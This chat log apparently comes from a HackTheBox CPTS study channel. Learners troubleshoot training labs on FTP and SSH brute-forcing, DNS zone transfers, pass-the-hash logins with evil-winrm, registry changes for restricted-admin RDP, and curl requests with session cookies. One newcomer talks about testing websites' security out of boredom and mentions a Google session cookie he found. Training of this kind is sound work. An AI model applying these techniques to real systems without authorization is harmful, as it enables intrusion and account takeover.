More like, "Oh hi mr. service! Oh user needs to access something? Well I dont have a record of them asking because kerberos is stateless. You dont have any proof this user needs the service? Well normally id be displeased with you mr. service but protocol transition is enabled so imma let it slide this time."

thorn urchin
leaden yew
#

So I would have to wait for an actual request to come through from an actual user or use the Printer Bug (maybe?) to force the user to authenticate to the service I want to access?

thorn urchin
#

that I have no clue yet kek

#

im halfway through the module, busy with work and life

leaden yew
#

ah ok, nw. Thanks anyway 🙂

hallow kiln
steel grail
#

im still stuck

#

its saying a valid authentication cookie is required now

fathom pendant
#

Seems like your cookie is not valid

steel grail
#

the PHPSESSID?

fathom pendant
#

Yes

steel grail
#

maybe i miss typed let me check

#

ah yes i did

#

im a bit dyslexic

upper ruin
#

Attacking Common Services: Medium Lab

I found the opened ports, besides the obvious ones there's loads of 5 number ports above the 10000s.
I tried to bruteforce FTP on 2121, Tried anonymous login as well, bruteforced SSH, didn't work.
I haven't used smtp user enum(since 23 isn't open) I might resort to some tactic that will obtain info from the pop3 as that's the only I can possinly extract info. I haven't used rockyou.txt yet, hence I will probs bruteforce with the provided user list and rockyou.

Am I on the right path?

#
  • I used dig axfr and found them .inlane domains. I did dig for txt , nothing found.
fathom pendant
fathom pendant
#

ceil

upper ruin
#

Bruh.

#

Wait no?

fathom pendant
#

Oh wait

#

They must've changed it again

upper ruin
#

D:

fathom pendant
#

But you do have a username

#

And the password can be bruteforced

fathom pendant
upper ruin
upper ruin
#

So curl?

fathom pendant
#

Nope

#

Just attempt to connect and you'll see

upper ruin
#

Oh..the ip:port on the firefox

fathom pendant
#

facepalm or with the ftp command

upper ruin
#

W marcie.

#

Well I tried ftp 2121, but uh..can you assign 1 service toi multiple ports??

steel grail
languid dawn
#

I don't think browsers support ftp anymore, it should be deprecated since like 2020

fossil crescent
steel grail
#

idk whats wrong 😦

languid dawn
#

maybe you need to use the hostname, just add it to the hosts file

#

I dunno just going by the error

steel grail
buoyant escarp
#

your curl request isnt complete

steel grail
#

what is missing?

pine dagger
#

It's at the end of his line...

fathom pendant
#

^

buoyant escarp
#

damn xD

#

think i need glasses lol

steel grail
#

curl -X POST -d '{"search":"london"}' -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php is what the module shows. but we replace london with flag

fathom pendant
steel grail
#

my site

#

from the search.php

pine dagger
#

You're missing a '

#

Basically it thinks that application is your hostname

steel grail
#

where is this missing '?

pine dagger
#

not sure why it's not picking it up at the content-type

fathom pendant
pine dagger
#

Oh wait

steel grail
#

wait

#

thats my old one

#

1 sec

#

😦 this shouldnt be that difficult

pine dagger
#

Try:
curl -X POST -d '{"search":"flag"}' -H 'PHPSESSID=ji4kcovqpslp8h79627945dbcq Content-Type: application/json' http://94.237.63.93:30436/search.php

steel grail
#

got a port number error that time

pine dagger
#

Or
curl -X POST -d '{"search":"flag"}' -H 'PHPSESSID=ji4kcovqpslp8h79627945dbcq' -H 'Content-Type: application/json' http://94.237.63.93:30436/search.php

steel grail
#

no sit

#

sir*

pine dagger
#

What do you mean "port error"

steel grail
#

URL rejected: Port number was not a decimal number between 0 and 65535

pine dagger
#

Which module/chapter are you doing?

steel grail
#

wait 1 sec i think i know my issue

#

ill tell you if this next thing dosnt work

pine dagger
#

Only other thing I can suggest at this point is to put the URL inside single quotes

#

or put the URL at the start

buoyant escarp
#

oh yes a whole number, enough for today 😄

steel grail
#

POST

pine dagger
#

Works for me

steel grail
#

i will try the ip at the start then

#

weird

pine dagger
#

Possibly try rebooting the target for a different IP and sessid

steel grail
#

yea idk whats up....

#

I feel like an idot.. idk why i cant do this

#

could it be cause im using windows console and not the imbeded VM?

#

im ... stupid

#

that was my issue

#

i had run out of sessions for academy and bought some blocks and it worked

fathom pendant
#

For using the pwnbox vm: yes

steel grail
#

weird. well i used the embded VM and it worked right away

fathom pendant
#

The issue was windows

steel grail
#

ah

#

i figured

fathom pendant
#

A lot of these commands are assuming linux

steel grail
#

I see that now

fathom pendant
#

So likely the windows version has some differences in syntax

steel grail
#

well stupid mistakes make great learners

#

thank you for troubleshooting earlier

fathom pendant
#

you'd have to do like curl --help in the windows cmd to see what flags line up

#

But imo just set up your own vm

#

¯_(ツ)_/¯

steel grail
#

i have one, but it was giving me issues yesterday too

prisma spruce
#

If you're using windows, curl is an alias for IWR

fathom pendant
upper ruin
#

Yo Marcie, so I found the user for the Attacking CS Medium lab on the port you told me, so I proceeded to bruteforce pretty much everything with pws. list be it ssh,ftp on 2121 and even 30021. I thought that having the domain inlane--- would assume there would be an email with the UserIFound@inlane---.htb

Any tips?

#

Besides the bruteforce.

#

So now I will be trying rockyou.txt I suppose.

fathom pendant
#

2121 is the initial vector

upper ruin
#

Strange.

steel grail
#

If it comes up again I’ll holler

#

But again thank you for dealing with me Marcie I appreciate it

fathom pendant
#

Likely it's user error

steel grail
#

🤙 ok

sterile epoch
#

so after hours I am in the last step for skill asssesment for tunnelling this is what I found in the domain controller machine what should I do now please

steel grail
#

Check all the ports

sterile epoch
#

are there more??

steel grail
#

One of em should have a vulnerability I guess

#

No I’m assuming one of the ones shown has a crack in it

fathom pendant
sterile epoch
#

I dunno which service to interact in the last hop

fathom pendant
#

The last user has dc access iirc

#

From rdp

sterile epoch
#

but there is no rdp in nmap I am running the scan again

#

I will try rdp to it

fathom pendant
#

445 would be the port

steel grail
sterile epoch
#

wait

fathom pendant
steel grail
steel grail
#

I remember it from one of the intro modules in lab

fathom pendant
fathom pendant
#

This module is related to pivoting and moving through an ad network

#

Using exposed creds and such to move through it

#

There's no real advanced cracking or skill required except enumeration

sterile epoch
fathom pendant
#

But also just rdp

#

You have a user on the last host

#

Just rdp and check available files

steel grail
fathom pendant
#

The ports list is a bunch of normal windows ad ports

sterile epoch
fathom pendant
#

I definitely recall rdp for this

sterile epoch
#

yes I am using that host see the cmd

#

am I doing something wrong?

fathom pendant
#

Either under network or this pc

#

I recall this being like really dumb

#

But iirc v* is the last user you get

sterile epoch
#

yes I checked that but its asking pass

fathom pendant
#

Enter user pass and it doesn't work?

upper ruin
#

DisableRestricted admin?

sterile epoch
#

I do not have the pass

fathom pendant
sterile epoch
#

I only have the hsh

sterile epoch
upper ruin
fathom pendant
#

You have rpc ports for that

#

Evil-winrm

upper ruin
#

get in the cmd and add the disable restricted admin, then go to the registry editor control/lsa

#

^ what marcie said

fathom pendant
upper ruin
#

ooo, that's my next module

fathom pendant
#

I just recall it being fairly straightforward

upper ruin
#

still stick on the medium lab

#

I did that , but uh...no success, reading through my ftp section rn.

#

I must be missing smth.

sterile epoch
#

I give up my rdp sessions got terminated

#

I dunno why

fathom pendant
upper ruin
upper ruin
sterile epoch
#

I have this much time

fathom pendant
sterile epoch
upper ruin
fathom pendant
upper ruin
#

A banner.

fathom pendant
#

I could absolutely be misremembering

upper ruin
#

That's the first. When I got anonymous login I found a file named simon.

#

Which I couldn't get.

fathom pendant
#

2121

upper ruin
#

Anonymous didn't work for that either.

#

Lemme retry.

chrome lotus
fathom pendant
#

USER'S ftp server

upper ruin
#

When I got it via wget it showed the banner.

fathom pendant
chrome lotus
#

Maybe try changing directories to this weird "simon" file :)

upper ruin
#

Bruh.

fathom pendant
#

But also

fathom pendant
upper ruin
#

Lemme try

chrome lotus
fathom pendant
#

I honestly haven't touched this module in a minutr

#

So I'd have to spin it up and check with pwnbox

upper ruin
#

OH MY

#

It was a directory, how did I not see the Drw

#

I will cry

chrome lotus
fathom pendant
#

It's also entirely possible they changed it since I last did it

upper ruin
#

Dude, I have no idea what I have in my mind about CPTS when I miss smth as simple as that

#

Maybe it's 2 am and thats why

upper ruin
#

Yooo, it's passwords.

#

Ain't no way, ima lose my 7 week streak.

fathom pendant
#

Wdym you had a whole ass week

upper ruin
#

wut

#

Oh, nah I bought a new pc and had to set it up and everything.

#

So I had to transfer my shi.

#

I have a folder where I keep my HTB experience with every skill assessment/lab that I have completed and the whole process.

#

I had to make sure that doesn't get lost else I will cry.

fathom pendant
#

Just do a tier 0 module

#

Ez money

upper ruin
#

what point would there be if it was easy

#

ima refer u to smth u said

#

:)))

#

I found the flag but it's under rootpepehands

fathom pendant
#

Stop exposing me

upper ruin
fathom pendant
#

This module has def changed since I last did it

upper ruin
#

Yeah, I logged in via SSH and pop3, nothing.

#

It appears that the mesage which gave an ssh key was in pop3 and ftp as well as in ssh.

fathom pendant
upper ruin
#

I will try that, completely forgot about 995.

#

What's the difference anyway?

#

More secure?

fathom pendant
#

Yes

#

And sometimes mail services will not allow interaction with the insecure port

upper ruin
#

Connection closed by foreign host...sigh.

#

I need a gun.

#

Oh wait I wrote pop3s instead of 995

#

Nevermind, same sh.

fathom pendant
#

Yes

#

Lol

upper ruin
#

Now, there was another way.

fathom pendant
#

Don't forget to log in with
USER
PASS

upper ruin
#

That I saw in the footprinting.

fathom pendant
#

Likely using browser

upper ruin
#

Yeah, it kicks me right when I enter the user.

fathom pendant
#

USER username

upper ruin
#

I can try with the user@domain

fathom pendant
upper ruin
#

Same sh

#

How do I do it through the browser?

#

Lemme check smth real quick.

fathom pendant
#

Logged in just fine for me

upper ruin
#

openssl s_client -connect 10.129.14.128:pop3s

#

I can try that

fathom pendant
#

yep that's what i did to connect

upper ruin
#

oH bruh, I use telnet

fathom pendant
#

You need to use openssl for the secure ports

#

That's why

#

Also you'll need to replace spaces with newlines

upper ruin
#

Yup, same message nonetheless.

#

I tried password reuse, nothing.

#

Bash history is clean.

#

I did try the ssh key for the root but requires root password.

#

Eventhough I did chmod 600

fathom pendant
upper ruin
#

Which one.

fathom pendant
#

Replace spaces with newlines

upper ruin
#

Oh...

#

In the SSH Key?

#

I knew smth was wrong when there were whitespaces.

#

Still error, can I send you the SSH key, it should be fine?

fathom pendant
#

It works fine for me after replacing the spaces in the ssh key with a new line

upper ruin
#

It should be 16 lines.

fathom pendant
#

As long as it starts -----OPEN and -----END

upper ruin
#

Yup.

fathom pendant
#

Yes

rustic sage
#

Hi!

upper ruin
#

Hi.

lusty thicket
#

Hi

fathom pendant
#

that's what the md5sum should be

rustic sage
#

so #cpts is for Testing Security of stuff right?

upper ruin
#

Lemme retry.

upper ruin
rustic sage
fathom pendant
fathom pendant
rustic sage
#

Finding bugs to log in?

#

Or stuff

fathom pendant
#

it's a certification exam akin to OSCP

upper ruin
#

Although it wouldn't change much.

fathom pendant
#

or 660

rustic sage
#

i had a account for it

upper ruin
#

Hm.

fathom pendant
#

but i'm able to login just fine with that ssh key

rustic sage
#

but cant log in

fathom pendant
rustic sage
#

og

upper ruin
rustic sage
#

oh

upper ruin
#

I will try for the root with the same sshkey.

fathom pendant
upper ruin
#

How so?

fathom pendant
#

ls

upper ruin
#

flag requires root,

fathom pendant
#

does it really though? 😉

upper ruin
#

BRUH

#

COME ON

fathom pendant
#

you just couldn't read it with ftp

upper ruin
#

But when I SSHed it had root root

fathom pendant
#

ls -la

upper ruin
#

Exactly,

fathom pendant
#

check perms

#

it is rw-r--r-- perms

#

meaning it's readable; only root can write it

upper ruin
#

Oh, I completely disregarded that.

#

Welp, with that the module is done.

fathom pendant
#

your screenshot has the flag in it BTW

upper ruin
#

Yup, thanks for that.

fathom pendant
#

Go to bed sirg get some rest

upper ruin
#

3 AM I can peacefully sleep.

#

Thank You, Marcie.,

#

Again.

#

o7

prisma spruce
#

skill issue

upper ruin
#

U dare to challenge me

#

!!!

prisma spruce
#

@fathom pendant Of the number of questions you've answered, how many of them are really basic stuff?

upper ruin
#

Don't answer.

#

Fu

prisma spruce
fathom pendant
upper ruin
#

40% cpts

fathom pendant
#

either that or i completely lost all memories of that skill assessment

upper ruin
#

May I blame it all on the fact that it is 3 am.

rustic sage
#

Ima test websites security Cus im bored:(

fathom pendant
#

but i'm like 99% sure that originally that skill assessment had at first the hint give you a username; then they just flat out gave you the username/pw; and now it's completely diff

fathom pendant
rustic sage
#

Oh

fathom pendant
#

#welcome read that on how to access more of the server

prisma spruce
rustic sage
#

Yuh

fathom pendant
upper ruin
#

I tried to download a directory bruh

rustic sage
upper ruin
#

I forgot to check perms on a file

prisma spruce
#

I'm astounded by the few who are able to continuously able to get blood on the boxes.

upper ruin
#

It's that easy sh that throws me away

fathom pendant
rustic sage
#

A site protector Has its own website surprising me

upper ruin
upper ruin
#

I didn't even see the drwx.

fathom pendant
#

also a lot of times if they've pwned boxes from that same creator; they'll likely have an idea of what the creator hides

rustic sage
upper ruin
#

I saw root root on a file and thought I required root perms, so I thought of digging back for password reusage so I can escalate.

rustic sage
#

Cus Chromebook Can’t do a lot of stuff on A PC

upper ruin
fathom pendant
#

if you wanna talk mad game go verify your account and talk in #general

upper ruin
#

Yk what, Ima get CPTS and stay noob hacker.

upper ruin
#

So I can troll.

fathom pendant
upper ruin
rustic sage
#

lol

fathom pendant
#

it was my idea, you stole my idea and since i'm american I can sue you for infringeing on my ideas

upper ruin
#

I...ok.

#

Ima become a script kiddie and then get cpts.

rustic sage
upper ruin
rustic sage
#

Like get access to Control the website

fathom pendant
upper ruin
#

Nah that's domain controler.

fathom pendant
upper ruin
#

I am tryna sound smart y y ruining it

rustic sage
#

what’s JSONP Callback??

upper ruin
fathom pendant
#

don't play fire with stupid; you'll lose that battle quick

upper ruin
#

aight, fr gnight, Ima do the hard lab myself

fathom pendant
fathom pendant
#

attack the lab as if it's a separate machine

upper ruin
#

Will do.

fathom pendant
#

that's what 100% clued me into the med lab being changed

placid edge
#

yo, i am doing the second skill assesment for attacking common applications and on the question off: What is the FQDN record of the third domain.

If i try using dig for this i cant seem to get anything

Tried different stuff but yeah a hint here would be nice. I have completed all the other questions on the assesment

rustic sage
#

I found somthing called _Secure-1-PSID

upper ruin
#

Yk, whats strange, months ago I felt that I would bne using exploits and stuff. I doubt that IRL anyone would have passwords in a txt file.

upper ruin
fathom pendant
solid python
#

I would recommend keeping this channel relevant to the modules in HTB

fathom pendant
placid edge
#

yeah but its weird. Since its not dns ports open and i get only connection refused

rustic sage
solid python